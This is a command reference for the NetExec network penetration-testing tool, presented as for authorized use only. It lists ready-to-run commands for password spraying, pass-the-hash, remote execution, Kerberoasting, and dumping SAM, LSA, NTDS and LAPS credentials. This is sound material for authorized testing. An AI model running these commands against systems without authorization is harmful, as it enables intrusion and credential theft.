NETEXEC
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
NetExec (nxc) is the successor to CrackMapExec (CME). Swiss army knife for network pentesting across multiple protocols.
INSTALLATION#
# pipx (recommended) pipx install netexec # pip pip install netexec # From source git clone https://github.com/Pennyw0rth/NetExec cd NetExec && pip install . # Kali sudo apt install netexec # Verify nxc --version
GENERAL SYNTAX#
nxc <protocol> <target> [options]
Protocols: smb, ldap, winrm, ssh, mssql, rdp, ftp, wmi, vnc, nfs
Targets: 10.10.10.1 # Single IP
10.10.10.0/24 # CIDR range
targets.txt # File with IPs
10.10.10.1-50 # IP range
AUTHENTICATION#
# Password nxc smb TARGET -u user -p 'password' nxc smb TARGET -u user -p 'password' -d DOMAIN # NTLM hash (pass-the-hash) nxc smb TARGET -u user -H 'NTLM_HASH' nxc smb TARGET -u user -H 'LM:NT' # Kerberos nxc smb TARGET -u user -p 'password' -k nxc smb TARGET -u user -p 'password' --use-kcache # Use ccache # AES key nxc smb TARGET -u user --aesKey AES256_KEY # Null session nxc smb TARGET -u '' -p '' # Guest nxc smb TARGET -u 'guest' -p '' # User/password lists (spraying) nxc smb TARGET -u users.txt -p 'password' # Spray one pass nxc smb TARGET -u users.txt -p passwords.txt # All combos nxc smb TARGET -u users.txt -p passwords.txt --no-bruteforce # Paired # Continue on success nxc smb TARGET -u users.txt -p 'pass' --continue-on-success
SMB PROTOCOL#
# Enumerate hosts nxc smb 10.10.10.0/24 # OS, hostname, domain # Share enumeration nxc smb TARGET -u user -p pass --shares # List shares nxc smb TARGET -u user -p pass --shares --filter-shares READ WRITE nxc smb TARGET -u user -p pass -M spider_plus # Spider shares # User enumeration nxc smb TARGET -u user -p pass --users # Domain users nxc smb TARGET -u user -p pass --groups # Domain groups nxc smb TARGET -u user -p pass --loggedon-users # Logged-on users nxc smb TARGET -u user -p pass --sessions # Active sessions nxc smb TARGET -u user -p pass --rid-brute # RID brute force # Password policy nxc smb TARGET -u user -p pass --pass-pol # Password policy # Execution methods nxc smb TARGET -u admin -p pass -x 'whoami' # cmd.exe nxc smb TARGET -u admin -p pass -X 'Get-Process' # PowerShell nxc smb TARGET -u admin -p pass -x 'whoami' --exec-method smbexec nxc smb TARGET -u admin -p pass -x 'whoami' --exec-method atexec nxc smb TARGET -u admin -p pass -x 'whoami' --exec-method wmiexec nxc smb TARGET -u admin -p pass -x 'whoami' --exec-method mmcexec nxc smb TARGET -u admin -p pass -x 'whoami' --exec-method dcomexec # File operations nxc smb TARGET -u admin -p pass --put-file local.exe \\Windows\\Temp\\remote.exe nxc smb TARGET -u admin -p pass --get-file \\Windows\\Temp\\file.txt local.txt # SAM dump nxc smb TARGET -u admin -p pass --sam # Dump SAM nxc smb TARGET -u admin -p pass --lsa # Dump LSA secrets nxc smb TARGET -u admin -p pass --ntds # DCSync (NTDS.dit) nxc smb TARGET -u admin -p pass --ntds --user admin # Single user DCSync nxc smb TARGET -u admin -p pass --dpapi # DPAPI secrets nxc smb TARGET -u admin -p pass --laps # LAPS passwords # GPP passwords nxc smb TARGET -u user -p pass -M gpp_password nxc smb TARGET -u user -p pass -M gpp_autologin
LDAP PROTOCOL#
# Enumeration nxc ldap TARGET -u user -p pass --users # All users nxc ldap TARGET -u user -p pass --groups # All groups nxc ldap TARGET -u user -p pass --gmsa # gMSA passwords nxc ldap TARGET -u user -p pass --trusted-for-delegation # Kerberoasting nxc ldap TARGET -u user -p pass --kerberoasting nxc ldap TARGET -u user -p pass --kerberoasting --kerberoast-output hashes.txt # AS-REP roasting nxc ldap TARGET -u user -p pass --asreproast nxc ldap TARGET -u user -p pass --asreproast --asreproast-output hashes.txt # BloodHound collection nxc ldap TARGET -u user -p pass --bloodhound --ns DC_IP -c All nxc ldap TARGET -u user -p pass --bloodhound --ns DC_IP -c DCOnly # AD CS enumeration nxc ldap TARGET -u user -p pass -M adcs nxc ldap TARGET -u user -p pass -M adcs --options FQDN=ca.domain.local # MAQ (MachineAccountQuota) nxc ldap TARGET -u user -p pass -M maq # Unconstrained delegation nxc ldap TARGET -u user -p pass --trusted-for-delegation # Password not required accounts nxc ldap TARGET -u user -p pass -M user-desc # User descriptions nxc ldap TARGET -u user -p pass -M get-unixUserPassword
WINRM PROTOCOL#
nxc winrm TARGET -u user -p pass # Check access nxc winrm TARGET -u user -p pass -x 'whoami' # Execute cmd nxc winrm TARGET -u user -p pass -X 'Get-Process' # Execute PS
SSH PROTOCOL#
nxc ssh TARGET -u user -p pass # Check creds nxc ssh TARGET -u user -p pass -x 'id' # Execute command nxc ssh TARGET -u user -p pass --key-file id_rsa # Key auth nxc ssh TARGET -u root -p pass --sudo # Test sudo
MSSQL PROTOCOL#
nxc mssql TARGET -u user -p pass # Check access nxc mssql TARGET -u user -p pass -q "SELECT @@version" # Query nxc mssql TARGET -u user -p pass -x 'whoami' # xp_cmdshell nxc mssql TARGET -u user -p pass --get-file C:\file local.txt nxc mssql TARGET -u user -p pass --put-file local.exe C:\temp\file.exe nxc mssql TARGET -u user -p pass -M mssql_priv # Priv esc check
RDP PROTOCOL#
nxc rdp TARGET -u user -p pass # Check access nxc rdp TARGET -u user -p pass --nla-screenshot # NLA screenshot nxc rdp TARGET -u user -p pass --screenshot # After-auth screenshot
WMI PROTOCOL#
nxc wmi TARGET -u user -p pass # Check access nxc wmi TARGET -u user -p pass -x 'whoami' # Execute
MODULES#
# List all modules nxc smb -L # SMB modules nxc ldap -L # LDAP modules # Module info nxc smb -M spider_plus --options # Show module options # Popular modules nxc smb TARGET -u user -p pass -M spider_plus # Spider shares nxc smb TARGET -u user -p pass -M webdav # Check WebDAV nxc smb TARGET -u user -p pass -M petitpotam # PetitPotam nxc smb TARGET -u user -p pass -M zerologon # Zerologon check nxc smb TARGET -u user -p pass -M nopac # noPac check nxc smb TARGET -u user -p pass -M slinky # Create LNK file nxc smb TARGET -u user -p pass -M scuffy # Create SCF file nxc smb TARGET -u user -p pass -M enum_av # Enumerate AV/EDR nxc smb TARGET -u user -p pass -M ioxidresolver # IOXIDResolver nxc smb TARGET -u user -p pass -M printnightmare # PrintNightmare
OUTPUT & LOGGING#
# Output formats nxc smb TARGET -u user -p pass --log output.txt # Database nxc smb TARGET -u user -p pass # Auto-logs to DB nxcdb # Query database nxcdb> export creds csv creds.csv # Export creds # Highlight Pwn3d! hosts # (Pwn3d!) = local admin access confirmed
MIGRATION FROM CRACKMAPEXEC#
# Command syntax is nearly identical # Replace: crackmapexec / cme โ nxc / netexec # Most CME modules work in NetExec # Database format updated (use nxcdb instead of cmedb) # Some module names may differ
COMMON WORKFLOWS#
# 1. Initial enumeration nxc smb 10.10.10.0/24 # Discover hosts nxc smb 10.10.10.0/24 --gen-relay-list relay.txt # SMB signing off # 2. Password spray nxc smb DC_IP -u users.txt -p 'Spring2024!' --continue-on-success # 3. Validate creds across protocols nxc smb TARGET -u user -p pass nxc winrm TARGET -u user -p pass nxc rdp TARGET -u user -p pass # 4. Post-compromise enum nxc smb 10.10.10.0/24 -u user -p pass --shares nxc ldap DC_IP -u user -p pass --bloodhound --ns DC_IP # 5. Credential harvesting nxc smb TARGET -u admin -p pass --sam nxc smb DC_IP -u da_user -p pass --ntds
TIPS#
- (Pwn3d!) means you have local admin = can execute commands - Use --continue-on-success for password spraying - Use --no-bruteforce with user/pass files for paired testing - nxcdb stores all results; use it to avoid rescanning - Check SMB signing with --gen-relay-list for relay attacks - Most CME guides translate directly to nxc - Use -M enum_av before deploying payloads